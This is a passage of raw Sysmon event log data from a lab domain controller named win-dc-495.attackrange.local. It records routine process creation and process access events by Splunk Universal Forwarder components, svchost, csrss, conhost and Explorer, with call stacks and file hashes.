Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019047Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:48.768{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-95F8-6005-7105-00000000A301}3232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019046Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:48.769{59A5CD1D-95F8-6005-7105-00000000A301}3232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019045Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:48.253{59A5CD1D-95F8-6005-7005-00000000A301}59166896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019044Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:48.100{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-95F8-6005-7005-00000000A301}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019043Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:48.098{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019042Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:06:48.098{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019041Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:48.098{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019040Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:06:48.098{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019039Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:48.098{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-95F8-6005-7005-00000000A301}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019038Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:48.097{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-95F8-6005-7005-00000000A301}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019037Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:48.097{59A5CD1D-95F8-6005-7005-00000000A301}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019062Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:49.487{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-95F9-6005-7205-00000000A301}6368C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019061Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:06:49.487{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019060Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:49.487{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019059Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:06:49.487{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019058Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:49.487{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019057Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:49.487{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-95F9-6005-7205-00000000A301}6368C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019056Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:49.487{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-95F9-6005-7205-00000000A301}6368C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019055Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:49.487{59A5CD1D-95F9-6005-7205-00000000A301}6368C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019089Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019088Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019087Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019086Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019085Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019084Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019083Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019082Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019081Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019080Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019079Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
